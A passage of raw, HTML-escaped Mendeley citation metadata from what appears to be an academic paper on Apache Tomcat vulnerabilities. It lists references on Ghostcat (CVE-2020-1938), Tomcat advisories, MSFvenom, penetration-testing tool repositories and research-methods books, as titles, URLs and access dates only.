ed Analysis of Ghostcat Vulnerability (Cve-2020–1938) in Apache Tomcat Servers | by Cyber Defecers | InfoSec Write-ups&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,25]]},&quot;URL&quot;:&quot;https://infosecwriteups.com/detailed-analysis-of-ghostcat-vulnerability-cve-2020-1938-in-apache-tomcat-servers-and-using-it-736146c986a3&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_13c7ff60-268b-4db5-b6f1-d092b31ff4f8&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[45]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;309b57fc-0d66-3382-a753-9fe8f319c2ae&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;309b57fc-0d66-3382-a753-9fe8f319c2ae&quot;,&quot;title&quot;:&quot;Detailed Analysis of Ghostcat Vulnerability (Cve-2020–1938) in Apache Tomcat Servers | by Cyber Defecers | InfoSec Write-ups&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,25]]},&quot;URL&quot;:&quot;https://infosecwriteups.com/detailed-analysis-of-ghostcat-vulnerability-cve-2020-1938-in-apache-tomcat-servers-and-using-it-736146c986a3&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_c0722b3b-daf8-4fee-a6ab-9f8d24441a89&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[43]–[46]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;9401d722-7acc-387c-80aa-268dac73b260&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;9401d722-7acc-387c-80aa-268dac73b260&quot;,&quot;title&quot;:&quot;CVE-2020-1938: Ghostcat vulnerability&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,25]]},&quot;URL&quot;:&quot;https://www.chaitin.cn/en/ghostcat&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;309b57fc-0d66-3382-a753-9fe8f319c2ae&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;309b57fc-0d66-3382-a753-9fe8f319c2ae&quot;,&quot;title&quot;:&quot;Detailed Analysis of Ghostcat Vulnerability (Cve-2020–1938) in Apache Tomcat Servers | by Cyber Defecers | InfoSec Write-ups&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,25]]},&quot;URL&quot;:&quot;https://infosecwriteups.com/detailed-analysis-of-ghostcat-vulnerability-cve-2020-1938-in-apache-tomcat-servers-and-using-it-736146c986a3&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;54278250-af79-37f4-9cf0-e43d6c8af1d2&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;54278250-af79-37f4-9cf0-e43d6c8af1d2&quot;,&quot;title&quot;:&quot;Detailed Analysis of Ghostcat Vulnerability (Cve-2020–1938) in Apache Tomcat Servers | by Cyber Defecers | InfoSec Write-ups&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,25]]},&quot;URL&quot;:&quot;https://infosecwriteups.com/detailed-analysis-of-ghostcat-vulnerability-cve-2020-1938-in-apache-tomcat-servers-and-using-it-736146c986a3&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;4b7879d6-2b50-3244-96bb-89569492053f&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;4b7879d6-2b50-3244-96bb-89569492053f&quot;,&quot;title&quot;:&quot;What is Middleware - Definition and Examples | Microsoft Azure&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,25]]},&quot;URL&quot;:&quot;https://azure.microsoft.com/en-in/overview/what-is-middleware/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_4cd00404-e053-41f7-9399-5c9f514319f3&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[47], [48]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;bdce39a0-128f-35f9-b2c4-035ef9e15cfd&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;bdce39a0-128f-35f9-b2c4-035ef9e15cfd&quot;,&quot;title&quot;:&quot;Apache Tomcat® - Apache Tomcat 7 vulnerabilities&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,12]]},&quot;URL&quot;:&quot;https://tomcat.apache.org/security-7.html&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;18144b31-61fe-3cca-bde1-1ff0bf24e2aa&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;18144b31-61fe-3cca-bde1-1ff0bf24e2aa&quot;,&quot;title&quot;:&quot;GitHub - mgeeky/tomcatWarDeployer: Apache Tomcat auto WAR deployment &amp; pwning penetration testing tool.&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,12]]},&quot;URL&quot;:&quot;https://github.com/mgeeky/tomcatWarDeployer&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_59c1071f-77d2-469a-a76a-232dfc9a8014&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[49]–[51]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;e20c1768-73d2-3154-9799-40a114c125d7&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;e20c1768-73d2-3154-9799-40a114c125d7&quot;,&quot;title&quot;:&quot;MSFvenom - Metasploit Unleashed&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,12]]},&quot;URL&quot;:&quot;https://www.offensive-security.com/metasploit-unleashed/msfvenom/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;c6472092-f49d-3700-b824-3e71942d2566&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;c6472092-f49d-3700-b824-3e71942d2566&quot;,&quot;title&quot;:&quot;GitHub - g0tmi1k/msfpc: MSFvenom Payload Creator (MSFPC)&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,12]]},&quot;URL&quot;:&quot;https://github.com/g0tmi1k/msfpc&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;8e10e733-a16a-3270-b9aa-c3d699f8b31e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;8e10e733-a16a-3270-b9aa-c3d699f8b31e&quot;,&quot;title&quot;:&quot;Hacking: MSFvenom&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Chandel&quot;,&quot;given&quot;:&quot;R&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_3b0351ae-b5d5-4fab-931a-7d03ae0b6566&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[49]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;e20c1768-73d2-3154-9799-40a114c125d7&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;e20c1768-73d2-3154-9799-40a114c125d7&quot;,&quot;title&quot;:&quot;MSFvenom - Metasploit Unleashed&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,12]]},&quot;URL&quot;:&quot;https://www.offensive-security.com/metasploit-unleashed/msfvenom/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_f27230e2-c5b5-4b97-b049-95a04aa6cc81&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[52]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;title&quot;:&quot;Research Designs&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;John'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;David'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2018]]},&quot;publisher-place&quot;:&quot;Los Angeles&quot;,&quot;edition&quot;:&quot;5th&quot;,&quot;publisher&quot;:&quot;SAGE Publication Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_d5c7b3bd-1e17-4b9d-aac9-fd7074d9d314&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[52]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;title&quot;:&quot;Research Designs&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;John'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;David'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2018]]},&quot;publisher-place&quot;:&quot;Los Angeles&quot;,&quot;edition&quot;:&quot;5th&quot;,&quot;publisher&quot;:&quot;SAGE Publication Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_ea1f5483-a876-4646-a9dc-a01811775c35&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[52]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;title&quot;:&quot;Research Designs&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;John'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;David'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2018]]},&quot;publisher-place&quot;:&quot;Los Angeles&quot;,&quot;edition&quot;:&quot;5th&quot;,&quot;publisher&quot;:&quot;SAGE Publication Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_c57658dc-bb52-49f6-8eee-d94b7e3f8be1&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[52]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;title&quot;:&quot;Research Designs&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;John'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;David'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2018]]},&quot;publisher-place&quot;:&quot;Los Angeles&quot;,&quot;edition&quot;:&quot;5th&quot;,&quot;publisher&quot;:&quot;SAGE Publication Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_c87c7815-c1cd-49b2-b542-b52f3e76e12b&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[52]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;title&quot;:&quot;Research Designs&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;John'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;David'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2018]]},&quot;publisher-place&quot;:&quot;Los Angeles&quot;,&quot;edition&quot;:&quot;5th&quot;,&quot;publisher&quot;:&quot;SAGE Publication Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_cb949acb-6c82-4610-aff7-edf6da132714&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[52]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;title&quot;:&quot;Research Designs&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;John'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;David'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2018]]},&quot;publisher-place&quot;:&quot;Los Angeles&quot;,&quot;edition&quot;:&quot;5th&quot;,&quot;publisher&quot;:&quot;SAGE Publication Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_5fc06639-f229-4c20-92d7-f8276ec24681&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[52]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;title&quot;:&quot;Research Designs&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;John'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;David'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2018]]},&quot;publisher-place&quot;:&quot;Los Angeles&quot;,&quot;edition&quot;:&quot;5th&quot;,&quot;publisher&quot;:&quot;SAGE Publication Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_39eb75a8-4718-4c3b-88d1-3be62141071e&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[52]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;title&quot;:&quot;Research Designs&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;John'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;David'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2018]]},&quot;publisher-place&quot;:&quot;Los Angeles&quot;,&quot;edition&quot;:&quot;5th&quot;,&quot;publisher&quot;:&quot;SAGE Publication Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_7ec35ebe-6961-4a2e-aee7-467349a9dd94&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[53]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;e46e9e88-5bb5-3d16-83b8-3f791466a147&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;e46e9e88-5bb5-3d16-83b8-3f791466a147&quot;,&quot;title&quot;:&quot;Longitudinal studies&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Caruana&quot;,&quot;given&quot;:&quot;Edward Joseph&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Roman&quot;,&quot;given&quot;:&quot;Marius&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Hernández-Sánchez&quot;,&quot;given&quot;:&quot;Jules&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Solli&quot;,&quot;given&quot;:&quot;Piergiorgio&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title&quot;:&quot;Journal of Thoracic Disease&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,24]]},&quot;DOI&quot;:&quot;10.3978/J.ISSN.2072-1439.2015.10.63&quot;,&quot;ISSN&quot;:&quot;20776624&quot;,&quot;PMID&quot;:&quot;26716051&quot;,&quot;issued&quot;:{&quot;date-parts&quot;:[[2015]]},&quot;page&quot;:&quot;E537-E540&quot;,&quot;publisher&quot;:&quot;Pioneer Bioscience Publishing&quot;,&quot;issue&quot;:&quot;11&quot;,&quot;volume&quot;:&quot;7&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_42af9fac-0999-460c-8d48-f6fdc5b3b2c2&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[53]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;e46e9e88-5bb5-3d16-83b8-3f791466a147&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;e46e9e88-5bb5-3d16-83b8-3f791466a147&quot;,&quot;title&quot;:&quot;Longitudinal studies&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Caruana&quot;,&quot;given&quot;:&quot;Edward Joseph&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Roman&quot;,&quot;given&quot;:&quot;Marius&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Hernández-Sánchez&quot;,&quot;given&quot;:&quot;Jules&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Solli&quot;,&quot;given&quot;:&quot;Piergiorgio&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title&quot;:&quot;Journal of Thoracic Disease&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,24]]},&quot;DOI&quot;:&quot;10.3978/J.ISSN.2072-1439.2015.10.63&quot;,&quot;ISSN&quot;:&quot;20776624&quot;,&quot;PMID&quot;:&quot;26716051&quot;,&quot;issued&quot;:{&quot;date-parts&quot;:[[2015]]},&quot;page&quot;:&quot;E537-E540&quot;,&quot;publisher&quot;:&quot;Pioneer Bioscience Publishing&quot;,&quot;issue&quot;:&quot;11&quot;,&quot;volume&quot;:&quot;7&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_6cbe3e07-8bd7-42f1-9a0e-1a6cf36d33b9&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[52]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;0d036443-8dc3-3ec8-934b-7b25ae15f81e&quot;,&quot;title&quot;:&quot;Research Designs&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;John'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;'Creswell&quot;,&quot;given&quot;:&quot;David'&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2018]]},&quot;publisher-place&quot;:&quot;Los Angeles&quot;,&quot;edition&quot;:&quot;5th&quot;,&quot;publisher&quot;:&quot;SAGE Publication Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_077f6f10-74ed-41e5-9d6e-dbd159055a51&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[54]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;66598aab-766a-3b46-bf0d-85b579d3628d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;66598aab-766a-3b46-bf0d-85b579d3628d&quot;,&quot;title&quot;:&quot;GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina 